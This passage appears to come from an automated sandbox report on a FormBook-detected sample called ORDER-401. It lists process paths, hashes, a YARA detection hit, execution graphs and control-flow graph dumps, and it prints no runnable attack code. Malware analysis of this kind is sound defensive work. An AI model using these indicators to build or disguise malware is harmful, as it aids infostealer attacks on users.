• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false

Target ID: 9
Start time: 15:38:02
Start date: 12/12/2024
Path: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe"
                                                                  Imagebase:0xd60000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:11
                                                                  Start time:15:38:14
                                                                  Start date:12/12/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6d20e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                    Execution Graph

                                                                    Execution Coverage:7.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:103
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 26891 2a7a5d0 26895 2a7a6b8 26891->26895 26905 2a7a6c8 26891->26905 26892 2a7a5df 26896 2a7a6c8 26895->26896 26899 2a7a6fc 26896->26899 26915 2a78974 26896->26915 26899->26892 26900 2a7a6f4 26900->26899 26901 2a7a900 GetModuleHandleW 26900->26901 26902 2a7a92d 26901->26902 26902->26892 26906 2a7a6d9 26905->26906 26909 2a7a6fc 26905->26909 26907 2a78974 GetModuleHandleW 26906->26907 26908 2a7a6e4 26907->26908 26908->26909 26913 2a7a951 GetModuleHandleW 26908->26913 26914 2a7a960 GetModuleHandleW 26908->26914 26909->26892 26910 2a7a6f4 26910->26909 26911 2a7a900 GetModuleHandleW 26910->26911 26912 2a7a92d 26911->26912 26912->26892 26913->26910 26914->26910 26916 2a7a8b8 GetModuleHandleW 26915->26916 26918 2a7a6e4 26916->26918 26918->26899 26919 2a7a960 26918->26919 26922 2a7a951 26918->26922 26920 2a78974 GetModuleHandleW 26919->26920 26921 2a7a974 26920->26921 26921->26900 26923 2a7a960 26922->26923 26924 2a78974 GetModuleHandleW 26923->26924 26925 2a7a974 26924->26925 26925->26900 26797 2a74528 26798 2a74549 26797->26798 26801 2a74300 26798->26801 26800 2a74550 26802 2a7430b 26801->26802 26805 2a74310 26802->26805 26804 2a746e5 26804->26800 26806 2a7431b 26805->26806 26809 2a74330 26806->26809 26808 2a7487d 26808->26804 26810 2a7433b 26809->26810 26813 2a74360 26810->26813 26812 2a7495a 26812->26808 26814 2a7436b 26813->26814 26817 2a74390 26814->26817 26816 2a74a5c 26816->26812 26818 2a7439b 26817->26818 26824 2a77674 26818->26824 26820 2a77ba9 26820->26816 26821 2a77980 26821->26820 26829 2a7c698 26821->26829 26838 2a7c689 26821->26838 26825 2a7767f 26824->26825 26826 2a7916a 26825->26826 26847 2a791b8 26825->26847 26851 2a791c8 26825->26851 26826->26821 26830 2a7c6b9 26829->26830 26831 2a7c6dd 26830->26831 26834 2a7c77d 26830->26834 26855 2a7c8c7 26830->26855 26860 2a7c848 26830->26860 26864 2a7c839 26830->26864 26831->26820 26832 2a7c812 26832->26820 26833 2a7c8c7 2 API calls 
26833->26834 26834->26832 26834->26833 26840 2a7c6b9 26838->26840 26839 2a7c6dd 26839->26820 26840->26839 26843 2a7c77d 26840->26843 26844 2a7c8c7 2 API calls 26840->26844 26845 2a7c839 2 API calls 26840->26845 26846 2a7c848 2 API calls 26840->26846 26841 2a7c812 26841->26820 26842 2a7c8c7 2 API calls 26842->26843 26843->26841 26843->26842 26844->26843 26845->26843 26846->26843 26848 2a7920b 26847->26848 26849 2a79216 KiUserCallbackDispatcher 26848->26849 26850 2a79240 26848->26850 26849->26850 26850->26826 26852 2a7920b 26851->26852 26853 2a79216 KiUserCallbackDispatcher 26852->26853 26854 2a79240 26852->26854 26853->26854 26854->26826 26856 2a7c8d5 26855->26856 26857 2a7c860 26855->26857 26856->26834 26858 2a7c88f 26857->26858 26869 2a7b420 26857->26869 26858->26834 26861 2a7c855 26860->26861 26862 2a7c88f 26861->26862 26863 2a7b420 2 API calls 26861->26863 26862->26834 26863->26862 26865 2a7c7f1 26864->26865 26867 2a7c842 26864->26867 26865->26834 26866 2a7c88f 26866->26834 26867->26866 26868 2a7b420 2 API calls 26867->26868 26868->26866 26870 2a7b425 26869->26870 26872 2a7d5a8 26870->26872 26873 2a7ca44 26870->26873 26874 2a7ca4f 26873->26874 26875 2a74390 2 API calls 26874->26875 26876 2a7d617 26875->26876 26876->26872 26877 2a7cd68 26878 2a7cdae 26877->26878 26882 2a7cf38 26878->26882 26885 2a7cf48 26878->26885 26879 2a7ce9b 26888 2a7b440 26882->26888 26886 2a7cf76 26885->26886 26887 2a7b440 DuplicateHandle 26885->26887 26886->26879 26887->26886 26889 2a7cfb0 DuplicateHandle 26888->26889 26890 2a7cf76 26889->26890 26890->26879

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 24e069eee1c942219be905d0f431a8f7b90783f9046ab412c0aae6668068e385
                                                                    • Instruction ID: a02c1ea66084da2d549e7c1556c62bbb3af3c6512d575d19dee8357d4f60bd2b
                                                                    • Opcode Fuzzy Hash: 24e069eee1c942219be905d0f431a8f7b90783f9046ab412c0aae6668068e385
                                                                    • Instruction Fuzzy Hash: 79714670A00B059FDB24DF29D99475ABBF6FF88304F008A2DD48AD7A40DB34E946CB95

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 2a7b440-2a7d044 DuplicateHandle 61 2a7d046-2a7d04c 59->61 62 2a7d04d-2a7d06a 59->62 61->62
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A7CF76,?,?,?,?,?), ref: 02A7D037
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: f10ee6652f8f6087c20a9c61b3c1bc53b9a870d63b4cdbc643db5bd6c654042f
                                                                    • Instruction ID: fd58fd30e3573fdc48f9e6b7d06c9075d35475c133c7e2e1da6a35c6a536d1a9
                                                                    • Opcode Fuzzy Hash: f10ee6652f8f6087c20a9c61b3c1bc53b9a870d63b4cdbc643db5bd6c654042f
                                                                    • Instruction Fuzzy Hash: 012107B59003489FDB10CF9AD984ADEBBF4FB48310F14801AE914A3310C374A941CFA4

                                                                    Control-flow Graph

                                                                    control_flow_graph 65 2a7cfa9-2a7d044 DuplicateHandle 66 2a7d046-2a7d04c 65->66 67 2a7d04d-2a7d06a 65->67 66->67
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A7CF76,?,?,?,?,?), ref: 02A7D037
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 18a8a367c11136dafaea864733b53bb635edc2b1eef8fbc3dcc2890d217a8a74
                                                                    • Instruction ID: 1898796b7e0eb586f92dd95bc0ce829d596f8ca3bf14382c2cf15efb5d03e28e
                                                                    • Opcode Fuzzy Hash: 18a8a367c11136dafaea864733b53bb635edc2b1eef8fbc3dcc2890d217a8a74
                                                                    • Instruction Fuzzy Hash: FA21E2B5900249DFDB10CFAAD984AEEBFF4FB48310F14841AE958A3250C378AA45CF65

                                                                    Control-flow Graph

                                                                    control_flow_graph 70 2a791b8-2a79214 72 2a79216-2a7923e KiUserCallbackDispatcher 70->72 73 2a79262-2a7927b 70->73 74 2a79247-2a7925b 72->74 75 2a79240-2a79246 72->75 74->73 75->74
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02A7922D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: f1dc77d31963dabd433b00a5dbd07e2acf2606ee33c108a9b73c7eb303f579b0
                                                                    • Instruction ID: 720f5bbb6629a496dbfda2c2795e52788d8c1056792702e0016628fa4794f044
                                                                    • Opcode Fuzzy Hash: f1dc77d31963dabd433b00a5dbd07e2acf2606ee33c108a9b73c7eb303f579b0
                                                                    • Instruction Fuzzy Hash: 5B11EEB1804389CEEB20DF99C5013EEFFF4EB08318F14449AE098A3281C77D6644CBA5

                                                                    Control-flow Graph

                                                                    control_flow_graph 77 2a78974-2a7a8f8 79 2a7a900-2a7a92b GetModuleHandleW 77->79 80 2a7a8fa-2a7a8fd 77->80 81 2a7a934-2a7a948 79->81 82 2a7a92d-2a7a933 79->82 80->79 82->81
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02A7A6E4), ref: 02A7A91E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 51f1648b1b1ef12ead591ddbbe1b9af4086f5515c401aee43a287376a24d849b
                                                                    • Instruction ID: 59f2effb07318107b30a9c19ee5d9c6f480d2d0788d4d50206e3c9f2b826bb94
                                                                    • Opcode Fuzzy Hash: 51f1648b1b1ef12ead591ddbbe1b9af4086f5515c401aee43a287376a24d849b
                                                                    • Instruction Fuzzy Hash: 0F1132B5C003499FDB20DF9AD844B9FFBF4EB88314F11802AD869A7201C7B8A505CFA5

                                                                    Control-flow Graph

                                                                    control_flow_graph 84 2a791c8-2a79214 86 2a79216-2a7923e KiUserCallbackDispatcher 84->86 87 2a79262-2a7927b 84->87 88 2a79247-2a7925b 86->88 89 2a79240-2a79246 86->89 88->87 89->88
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02A7922D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 90fd269ca28917fd92496191d94a5dba5f79e2bdb9fed16f95be6d97000a9515
                                                                    • Instruction ID: 539f5216eb4e750241292f43af61789379176625b28de485477d656b6d3293b7
                                                                    • Opcode Fuzzy Hash: 90fd269ca28917fd92496191d94a5dba5f79e2bdb9fed16f95be6d97000a9515
                                                                    • Instruction Fuzzy Hash: 6B118BB1804389CEEB20DF96D5457EEFFF8AB04318F14409AE498A3281CB796644CBA5

                                                                    Control-flow Graph

                                                                    control_flow_graph 91 7cb48a8-7cb4910 97 7cb4917-7cb491d 91->97 120 7cb4920 call 7cb8339 97->120 121 7cb4920 call 7cb4aae 97->121 122 7cb4920 call 7cb4d12 97->122 123 7cb4920 call 7cb4eb0 97->123 124 7cb4920 call 7cb5e07 97->124 98 7cb4926-7cb4a9f call 7cb46bc 120->98 121->98 122->98 123->98 124->98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*&/)(#$^@!~-_
                                                                    • API String ID: 0-3325533558
                                                                    • Opcode ID: 3f896640127b9f50ca24e28f6d7f7b939cfd4379ea0d332b8763ead79d89b5e6
                                                                    • Instruction ID: 84973664f38f153af0b2e929182db53cfd320a25bf76865b315326ebb6f4cb83
                                                                    • Opcode Fuzzy Hash: 3f896640127b9f50ca24e28f6d7f7b939cfd4379ea0d332b8763ead79d89b5e6
                                                                    • Instruction Fuzzy Hash: 9551D271B042509BD7047F74E85679E3BA2BF88700F4588BCE9899F28ADF7A190987D1

                                                                    Control-flow Graph

                                                                    control_flow_graph 125 7cb48b8-7cb491d 153 7cb4920 call 7cb8339 125->153 154 7cb4920 call 7cb4aae 125->154 155 7cb4920 call 7cb4d12 125->155 156 7cb4920 call 7cb4eb0 125->156 157 7cb4920 call 7cb5e07 125->157 131 7cb4926-7cb4a9f call 7cb46bc 153->131 154->131 155->131 156->131 157->131
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*&/)(#$^@!~-_
                                                                    • API String ID: 0-3325533558
                                                                    • Opcode ID: 2b5018fa113e8a1e5952c78b63524f4c317680003af0ff47e4490b6ea8e62d0a
                                                                    • Instruction ID: dbdb353392157f1a2c7c78436b2d51b03625cdab395cd154d482f50d85d353f9
                                                                    • Opcode Fuzzy Hash: 2b5018fa113e8a1e5952c78b63524f4c317680003af0ff47e4490b6ea8e62d0a
                                                                    • Instruction Fuzzy Hash: 2641C2717042509BD7147F74A85679E7BA2BFC8700F0488BCED899F28ADF7A190987D1

                                                                    Control-flow Graph

                                                                    control_flow_graph 697 7cb14a8-7cb1555 704 7cb155b-7cb15ee 697->704 710 7cb15f2-7cb15fb 704->710 711 7cb15f0 704->711 712 7cb15ff-7cb1608 710->712 713 7cb15fd 710->713 711->710 714 7cb160a 712->714 715 7cb1610-7cb1614 712->715 713->712 714->715 716 7cb175c-7cb1765 714->716 717 7cb161b 715->717 718 7cb1616-7cb1619 715->718 719 7cb176d-7cb179b 716->719 720 7cb1767 716->720 721 7cb161e-7cb1655 717->721 718->721 723 7cb179d-7cb17a0 719->723 724 7cb17a2-7cb17a6 719->724 720->719 722 7cb188b-7cb190d call 7cb0338 720->722 725 7cb165c-7cb1660 721->725 726 7cb1657-7cb165a 721->726 743 7cb191b 722->743 744 7cb190f-7cb1919 722->744 723->724 729 7cb17a9-7cb17ad 723->729 724->729 727 7cb1663-7cb1667 725->727 726->725 726->727 730 7cb1669-7cb166c 727->730 731 7cb166e 727->731 733 7cb17af-7cb17b2 729->733 734 7cb17b4 729->734 735 7cb1671-7cb16a8 730->735 731->735 736 7cb17b7-7cb17ee 733->736 734->736 737 7cb16aa-7cb16ad 735->737 738 7cb16af-7cb16b3 735->738 740 7cb17f0-7cb17f3 736->740 741 7cb17f5-7cb17f9 736->741 737->738 742 7cb16b6-7cb16ba 737->742 738->742 740->741 745 7cb17fc-7cb182a 740->745 741->745 746 7cb16bc-7cb16bf 742->746 747 7cb16c1 742->747 748 7cb191d-7cb191f 743->748 744->748 749 7cb182c-7cb182f 745->749 750 7cb1831-7cb1835 745->750 751 7cb16c4-7cb16fb 746->751 747->751 752 7cb1a17-7cb1a1b 748->752 753 7cb1925-7cb1a0f call 7cb0348 748->753 749->750 754 7cb1838-7cb183c 749->754 750->754 757 7cb16fd-7cb1700 751->757 758 7cb1702-7cb1706 751->758 755 7cb1a29 752->755 756 7cb1a1d-7cb1a27 752->756 753->752 759 7cb183e-7cb1841 754->759 760 7cb1843 754->760 762 7cb1a2b-7cb1a2d 755->762 756->762 757->758 763 7cb1709-7cb170d 757->763 758->763 761 7cb1846-7cb187d 759->761 760->761 769 7cb187f-7cb1882 761->769 770 7cb1884-7cb1888 761->770 765 7cb1a33-7cb1b1d call 7cb0348 762->765 766 7cb1b25-7cb1bab 762->766 767 7cb170f-7cb1712 763->767 768 7cb1714 763->768 765->766 787 7cb1bed-7cb1c43 766->787 788 
7cb1bad-7cb1bb9 766->788 771 7cb1717-7cb174e 767->771 768->771 769->722 769->770 770->722 775 7cb1750-7cb1753 771->775 776 7cb1755-7cb1759 771->776 775->716 775->776 776->716 788->787 791 7cb1bbb-7cb1bd4 788->791 791->787 796 7cb1bd6-7cb1be5 791->796 796->787
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4ed1d426577a413d8be8f58345560e16d487f81598533c92992c1b4f7288557
                                                                    • Instruction ID: 019ef232d867bfe23503a95e35ad9296a58ac2938a14711d1151df68e8c75e50
                                                                    • Opcode Fuzzy Hash: c4ed1d426577a413d8be8f58345560e16d487f81598533c92992c1b4f7288557
                                                                    • Instruction Fuzzy Hash: 3242F370D1061DCFCB25EFA8C8946DCBBB1BF49300F558299D5497B264EB30AA99CF81

                                                                    Control-flow Graph

                                                                    control_flow_graph 797 7cb1499-7cb1555 804 7cb155b-7cb15ee 797->804 810 7cb15f2-7cb15fb 804->810 811 7cb15f0 804->811 812 7cb15ff-7cb1608 810->812 813 7cb15fd 810->813 811->810 814 7cb160a 812->814 815 7cb1610-7cb1614 812->815 813->812 814->815 816 7cb175c-7cb1765 814->816 817 7cb161b 815->817 818 7cb1616-7cb1619 815->818 819 7cb176d-7cb179b 816->819 820 7cb1767 816->820 821 7cb161e-7cb1655 817->821 818->821 823 7cb179d-7cb17a0 819->823 824 7cb17a2-7cb17a6 819->824 820->819 822 7cb188b-7cb190d call 7cb0338 820->822 825 7cb165c-7cb1660 821->825 826 7cb1657-7cb165a 821->826 843 7cb191b 822->843 844 7cb190f-7cb1919 822->844 823->824 829 7cb17a9-7cb17ad 823->829 824->829 827 7cb1663-7cb1667 825->827 826->825 826->827 830 7cb1669-7cb166c 827->830 831 7cb166e 827->831 833 7cb17af-7cb17b2 829->833 834 7cb17b4 829->834 835 7cb1671-7cb16a8 830->835 831->835 836 7cb17b7-7cb17ee 833->836 834->836 837 7cb16aa-7cb16ad 835->837 838 7cb16af-7cb16b3 835->838 840 7cb17f0-7cb17f3 836->840 841 7cb17f5-7cb17f9 836->841 837->838 842 7cb16b6-7cb16ba 837->842 838->842 840->841 845 7cb17fc-7cb182a 840->845 841->845 846 7cb16bc-7cb16bf 842->846 847 7cb16c1 842->847 848 7cb191d-7cb191f 843->848 844->848 849 7cb182c-7cb182f 845->849 850 7cb1831-7cb1835 845->850 851 7cb16c4-7cb16fb 846->851 847->851 852 7cb1a17-7cb1a1b 848->852 853 7cb1925-7cb1a0f call 7cb0348 848->853 849->850 854 7cb1838-7cb183c 849->854 850->854 857 7cb16fd-7cb1700 851->857 858 7cb1702-7cb1706 851->858 855 7cb1a29 852->855 856 7cb1a1d-7cb1a27 852->856 853->852 859 7cb183e-7cb1841 854->859 860 7cb1843 854->860 862 7cb1a2b-7cb1a2d 855->862 856->862 857->858 863 7cb1709-7cb170d 857->863 858->863 861 7cb1846-7cb187d 859->861 860->861 869 7cb187f-7cb1882 861->869 870 7cb1884-7cb1888 861->870 865 7cb1a33-7cb1b1d call 7cb0348 862->865 866 7cb1b25-7cb1bab 862->866 867 7cb170f-7cb1712 863->867 868 7cb1714 863->868 865->866 887 7cb1bed-7cb1c43 866->887 888 
7cb1bad-7cb1bb9 866->888 871 7cb1717-7cb174e 867->871 868->871 869->822 869->870 870->822 875 7cb1750-7cb1753 871->875 876 7cb1755-7cb1759 871->876 875->816 875->876 876->816 888->887 891 7cb1bbb-7cb1bd4 888->891 891->887 896 7cb1bd6-7cb1be5 891->896 896->887
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3967ff35af82c9c7b15b84c42db5534f4f25cff56c9f074cb91d16bf51c36a03
                                                                    • Instruction ID: 88e38cf93b9696cf9f74ec5d7b505969b6259729035763389e844404d495f8c4
                                                                    • Opcode Fuzzy Hash: 3967ff35af82c9c7b15b84c42db5534f4f25cff56c9f074cb91d16bf51c36a03
                                                                    • Instruction Fuzzy Hash: 5F42E370D1061DCFCB25EFA8C8946DCBBB1BF49300F558699E5497B264EB309A98CF81

                                                                    Control-flow Graph (rendered graph omitted; function starting at 7cb88e8, calls 7cb8438 and 7cb52d0)
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 767d8c78c3c8dcde48e78ae3b5ea3fb9a015adea9998a2a0c152d754fed411d1
                                                                    • Instruction ID: b3d1a75425ba687e519af2ebcf0aa588a27f786706d0e37b2c720d6f61d2dbd5
                                                                    • Opcode Fuzzy Hash: 767d8c78c3c8dcde48e78ae3b5ea3fb9a015adea9998a2a0c152d754fed411d1
                                                                    • Instruction Fuzzy Hash: 32B16FB4B012059FDB15DB68D694BAEBBF6AF89710F2440A9E505EB3A1CB30DD01CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dfecbb9da1975542594db1e8218744373e1588366b8e7e04a6479d153ca5a9e
                                                                    • Instruction ID: efad0076e83ad108bf5b033467e0f79fd990bebf99f2f082cd81fab86da68d36
                                                                    • Opcode Fuzzy Hash: 9dfecbb9da1975542594db1e8218744373e1588366b8e7e04a6479d153ca5a9e
                                                                    • Instruction Fuzzy Hash: 91918DB0A04259CFDB14CBA5C480AEDBBF1FF85310F14816BE855AB395DB39E942CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77646275a8475ba482816f8a2707113266c67fbd209d22f756fab254993890fc
                                                                    • Instruction ID: 83feb245afd7bce46fd6bfab9059988a28184227eb14328224da9358a0853856
                                                                    • Opcode Fuzzy Hash: 77646275a8475ba482816f8a2707113266c67fbd209d22f756fab254993890fc
                                                                    • Instruction Fuzzy Hash: 5C8194B0A10509DFCB21DF68E9986EDBFB1FF45300F25446AF045A7294EB30D9A5CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d5a2cbf026bb1aaa8661ec7400416f1cd1a6956bc9b72dfb0bd420facdcb445
                                                                    • Instruction ID: 4e590af8411d6a61f2bef88ab3e76ed56def52786ca86efbadb74673ab292be8
                                                                    • Opcode Fuzzy Hash: 0d5a2cbf026bb1aaa8661ec7400416f1cd1a6956bc9b72dfb0bd420facdcb445
                                                                    • Instruction Fuzzy Hash: 08616270F102099FDB14DBA9C841BAEB7B6FBC4710F108166FD46AB385DB349946CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95178f89b67356ec47fea3e872fd2f0050785706eba5e37c6cef8ffdefe1794a
                                                                    • Instruction ID: 1bb6369e9b1f3d912b441b1e8dbf7e20f1c2d1179c6142878305a3f7331672f2
                                                                    • Opcode Fuzzy Hash: 95178f89b67356ec47fea3e872fd2f0050785706eba5e37c6cef8ffdefe1794a
                                                                    • Instruction Fuzzy Hash: 9A61C5B4E15218CFDB28CFEAC584AEDBBB6BF89300F109029E519AB355DB305945CF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9babf3ad830843ac51da97437a4136a76c84a27f27f4263c6b2c2a1a790515fd
                                                                    • Instruction ID: 38076748c79c58d472b6b006ece3a72d805d21ba94a02f974a76d020e70a99d2
                                                                    • Opcode Fuzzy Hash: 9babf3ad830843ac51da97437a4136a76c84a27f27f4263c6b2c2a1a790515fd
                                                                    • Instruction Fuzzy Hash: E971E5B8A14218CFDB24DFA5C584BDDBBBAFF4A311F159195E80AAB355C730A980CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4485ab4d49048d212ab0e4201cbf1586a70435f0cc042c6142ebda47c69614e5
                                                                    • Instruction ID: 6e8663f004949e2cb20efcd5093aeb035842692f33d5cc56f9f7916f7d2f726e
                                                                    • Opcode Fuzzy Hash: 4485ab4d49048d212ab0e4201cbf1586a70435f0cc042c6142ebda47c69614e5
                                                                    • Instruction Fuzzy Hash: 3051B8B1E1021ADFDF208FA9C981AFEB7B5FB48700F008166F542B7280E7759941CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 990a8e6a274da08e4f0dd9485de59d20b1446e9fd361bb72a8661f1049e30233
                                                                    • Instruction ID: bf320a3867c8deed3c853b16a002c5abd9761aa5d32179d766e6076b57089635
                                                                    • Opcode Fuzzy Hash: 990a8e6a274da08e4f0dd9485de59d20b1446e9fd361bb72a8661f1049e30233
                                                                    • Instruction Fuzzy Hash: 204168B4E192088BDB18CFAAD4806EEBBF6EB8A301F14D069F41AA3251C7345945CF50
                                                                    Memory Dump Source
